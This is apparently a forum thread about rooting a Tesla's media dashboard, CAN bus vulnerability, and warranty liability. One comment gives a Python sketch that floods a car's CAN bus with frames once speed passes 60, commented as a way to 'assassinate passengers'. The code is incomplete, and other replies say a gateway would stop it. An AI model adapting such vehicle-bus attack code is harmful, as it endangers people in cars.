I don't think anyone was claiming anything contrary to that, just that replacing the software running the media dash isn't going to fubar your car.
I don't think anyone was claiming anything contrary to that, just that replacing the software running the media dash isn't going to fubar your car.
I don't know enough about CAN bus to speak authoritatively about this, nor do I know the specifics of what the dashboard has access to, but given that the dash displays information like charge level and speed, I'd guess that the dash is getting that information directly from the CAN.
And I do know that CAN bus is very vulnerable. [1][2]... So you may be able to kill someone through /dev/can0, via a small program running in that chroot.
Eg: In Python
from canard import can
from canard.file import jsondb
from canard.hw import socketcan
# create and start device
dev = socketcan.SocketCanDev("/dev/can0")
dev.start()
# create our DoS frame
frame = can.Frame(id=0)
frame.dlc = 8
# load tesla can spec, eg: from [4]
# CAN3, ID 0x0256
b = parser.parse('tesla.json')
while True:
rec = dev.recv()
speedo = b.parse_frame(rec)
# assassinate passengers
if (speedo.speed > 60):
while True:
dev.send(frame)
[1]: https://www.blackhat.com/docs/asia-15/materials/asia-15-Even...[2]: http://security.stackexchange.com/questions/88724/is-there-a...
[3]: https://github.com/ericevenchick/CANard
[4]: http://skie.net/uploads/TeslaCAN/Tesla%20Model%20S%20CAN%20D...
What do you mean by that? I would think that once you get UID=0 nothing can stop you from doing whatever you want to that device.
You would have to get UID=0 on the canbus gateway to make requests 'willy nilly' on the critical canbus. Having UID=0 on the media centre would only help in making willy nilly requests to the gateway.
edit: clarity
As a tesla owner, I do wish they would hurry up and publish their app platform. They do have apps that they wrote themselves, that come with the car.
And I really wish they'd update their web browser, and even more wish they supported linux. Maybe the chromebook os support will be secure enough for android apps that even tesla could use it.
"Your honor, we were not responsible for that AutoPilot crash because the driver did an unauthorized modification of the car's software!"
In effect, the manufacturer can only deny warranty claims for a specific part iff the consumer's aftermarket repair/modifications were responsible for the warrantied part failing. i.e. "I tinted the windows, and now the brakes are failing" does not result in warranty claims on the brakes being denied. However, "I replaced the brake pads [with faulty pads], and now the brake rotors are failing" can result in a denied warranty claim.
Plus, in a connected car situation, its going to be very difficult to prove that one thing didn't cause another.
Because you rooted the media control system, your unapproved software had the ability to speak to the brake control system and apply more-than-designed force to the brakes and thereby caused this damage.
Could you be forced into proving a negative?
That said, I think most of these things happen in the context of class action suits. In a class action, its going to be hard to blame or exclude the 1% of the class that has rooted their car.
The trouble is that with mechanical parts it is usually very easy to see connections between elements - not so in digital world. I think the direction the car makers should take is to develop "microservices" with strict APIs, strict access lists and a guardian which double-checks if some requested operation really makes sense. That way if you root a media center you can't mess with the engine from there.
EDIT: I see from other comments that Tesla apparently does something similar. Too bad it's not standardized and open, but at least approach is right...